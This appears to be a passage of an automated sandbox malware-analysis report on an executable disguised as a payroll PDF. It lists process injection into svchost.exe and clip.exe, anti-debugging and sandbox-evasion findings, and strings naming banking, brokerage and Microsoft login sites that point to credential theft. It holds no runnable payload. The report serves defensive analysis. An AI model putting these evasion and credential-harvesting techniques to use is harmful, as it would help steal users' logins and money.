00000004.00000003.2334550588.0000000004721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2142190742.0000000004490000.00000004.00001000.00020000.00000000.sdmp, PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2141098342.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2237570493.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2239322264.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.0000000003700000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2332132673.0000000004573000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.0000000004A6E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2334550588.0000000004721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000002.00000002.2332101149.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300928384.000000000301A000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4602736718.0000000001088000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000004.00000002.4608397493.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2409252373.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.000000000677C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000004.00000002.4608397493.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2409252373.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.000000000677C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000002.2332101149.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300928384.000000000301A000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4602736718.0000000001088000.00000004.00000020.00020000.00000000.sdmp

Source: PAYROLL SUMMARY _pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002CC304 LoadLibraryA,GetProcAddress,

0_2_002CC304

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00278B85 push ecx; ret	0_2_00278B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004031C0 push eax; ret	2_2_004031C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004161D3 push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004162CC push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417356 push ebx; retf	2_2_00417359
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416338 push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004083DA push es; ret	2_2_004083DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040BBEC pushad ; iretd	2_2_0040BBEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418577 push 2823B84Bh; retf	2_2_00418587
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417D38 push ecx; iretd	2_2_00417D39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf	2_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411E39 push esp; ret	2_2_00411E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf	2_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370225F pushad ; ret	2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037027FA pushad ; ret	2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx	2_2_037309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370283D push eax; iretd	2_2_03702858
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AE6B94 push FFFFFFB8h; retf	3_2_03AE6B96
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AE6B13 push edi; ret	3_2_03AE6B14
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03ADAAA8 push esp; ret	3_2_03ADAAB0
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AEBA7B push ecx; iretd	3_2_03AEBA7C
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AE09A7 push ecx; iretd	3_2_03AE09A8
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AE11E6 push 2823B84Bh; retf	3_2_03AE11F6
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD1049 push es; ret	3_2_03AD104D
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD485B pushad ; iretd	3_2_03AD485D
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03ADFFC5 push ebx; retf	3_2_03ADFFC8
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AE764C push edx; ret	3_2_03AE7668
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048D27FA pushad ; ret	4_2_048D27F9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048D225F pushad ; ret	4_2_048D27F9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048D283D push eax; iretd	4_2_048D2858
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049009AD push ecx; mov dword ptr [esp], ecx	4_2_049009B6

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00254A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00254A35
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_002D55FD

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_002733C7

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	API/Special instruction interceptor: Address: 3DC3234
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\clip.exe	Window / User API: threadDelayed 6752			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Window / User API: threadDelayed 3220			Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\clip.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\clip.exe TID: 7136	Thread sleep count: 6752 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7136	Thread sleep time: -13504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7136	Thread sleep count: 3220 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 7136	Thread sleep time: -6440000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe TID: 4340	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe TID: 4340	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe TID: 4340	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe TID: 4340	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_002B4696
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BC93C FindFirstFileW,FindClose,	0_2_002BC93C
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_002BC9C7
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF200
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF35D
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BF65E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3A2B
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3D4E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BBF27
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005ABC20 FindFirstFileW,FindNextFileW,FindClose,	4_2_005ABC20

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00254AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00254AFE

Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 23802I71.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 23802I71.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 23802I71.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 23802I71.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 23802I71.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: clip.exe, 00000004.00000002.4600545677.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4606229012.000000000149F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: 23802I71.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 23802I71.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 23802I71.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: firefox.exe, 0000000A.00000002.2623222011.000001AC867BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 23802I71.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 23802I71.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 23802I71.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 23802I71.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 23802I71.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 23802I71.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 23802I71.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 23802I71.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 23802I71.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 23802I71.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004173E3 LdrLoadDll,

2_2_004173E3

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002C41FD BlockInput,

0_2_002C41FD

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00253B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00253B4C

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00285CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00285CCC

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002CC304 LoadLibraryA,GetProcAddress,

0_2_002CC304

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_03DC3500 mov eax, dword ptr fs:[00000030h]	0_2_03DC3500
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_03DC34A0 mov eax, dword ptr fs:[00000030h]	0_2_03DC34A0
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_03DC1E70 mov eax, dword ptr fs:[00000030h]	0_2_03DC1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]	2_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]	2_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]	2_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]	2_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]	2_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]	2_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]	2_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]	2_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]	2_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]	2_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
